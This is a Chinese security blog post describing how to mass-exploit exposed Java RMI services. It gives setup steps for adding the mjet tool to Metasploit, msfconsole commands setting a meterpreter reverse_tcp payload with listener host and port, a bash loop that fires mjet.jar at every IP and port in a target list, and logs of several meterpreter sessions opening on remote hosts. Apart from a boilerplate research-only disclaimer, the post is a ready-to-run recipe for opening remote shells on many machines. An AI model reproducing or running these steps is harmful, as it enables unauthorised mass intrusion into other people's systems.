RIM漏洞批量利用

颓废
颓废
颓废
441
文章
0
评论
2019年5月19日08:40:27评论498 views字数 2023阅读6分44秒阅读模式
摘要

下载mjet,https://github.com/mogwaisec/mjet 按照说明中的步骤: Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下

下载mjet,https://github.com/mogwaisec/mjet

按照说明中的步骤:

Copy the "MBean" folder to "data/java/metasploit"
Copy java_mlet_server.rb to "modules/exploits/multi/misc/"
这里有个坑,metasploit默认目录里没有data/java/这个目录,需要手动创建一下,而且里面缺少Payload.class这个类,find命令找一下,因为每个人的这个class位置都可能不一样。然后把它拷进/data/java/metasploit/下

启动msf监听,选择刚才导入的那个模块 

msf > use exploit/multi/misc/java_mlet_server msf exploit(multi/misc/java_mlet_server) > set payload java/meterpreter/reverse_tcp payload => java/meterpreter/reverse_tcp msf exploit(multi/misc/java_mlet_server) > set LHOST 1.1.1.1 LHOST => 1.1.1.1 msf exploit(multi/misc/java_mlet_server) > set LPORT 4444 LPORT => 4444 msf exploit(multi/misc/java_mlet_server) > set URIPATH /bobac/ URIPATH => /bobac/ msf exploit(multi/misc/java_mlet_server) > run [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://0.0.0.0:8080/bobac/ [*] Local IP: http://1.1.1.1:8080/bobac/ [*] Server started.

然后用下载的mjet.jar让远程主机主动连接我的服务器,批量利用可以写一个shell脚本。 

#!/bin/bash function getip(){ while read i do     timeout 2s java -jar mjet.jar -u http://1.1.1.1:8080/bobac/ -t `echo $i|awk '{print $1}'` -p `echo $i|awk '{print $2}'` done < rmi-ip.txt } getip

rmi-ip.txt是存放的ip与端口文件,直接执行。msf监听到并且直接获取会话session。 

msf exploit(multi/misc/java_mlet_server) > [*] x.x.x.x java_mlet_server - handling request for /bobac/ [*] Sending stage (53859 bytes) to x.x.x.x [*] Meterpreter session 3 opened (x.x.x.x:4444 -> x.x.x.x:33477) at 2018-02-24 17:38:05 +0800 [*] x.x.x.x java_mlet_server - handling request for /bobac/ [*] Sending stage (53859 bytes) to x.x.x.x [*] Meterpreter session 4 opened (x.x.x.x:4444 -> x.x.x.x:33486) at 2018-02-24 17:38:08 +0800 [*] x.x.x.x java_mlet_server - handling request for /bobac/ [*] Sending stage (53859 bytes) to x.x.x.x [*] Meterpreter session 5 opened (x.x.x.x:4444 -> x.x.x.x:19321) at 2018-02-24 17:38:22 +0800 [*] x.x.x.x java_mlet_server - handling request for /bobac/ [*] x.x.x.x java_mlet_server - handling request for /bobac/ [*] x.x.x.x java_mlet_server - handling request for /bobac/nhUsuayJ.jar [*] Sending stage (53859 bytes) to x.x.x.x [*] Meterpreter session 6 opened (x.x.x.x:4444 -> x.x.x.x:56411) at 2018-02-24 17:40:53 +080

RIM漏洞批量利用

参考地址:

https://www.secpulse.com/archives/6203.html

http://www.cnblogs.com/co10rway/p/8467312.html

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日08:40:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   RIM漏洞批量利用https://cn-sec.com/archives/67742.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息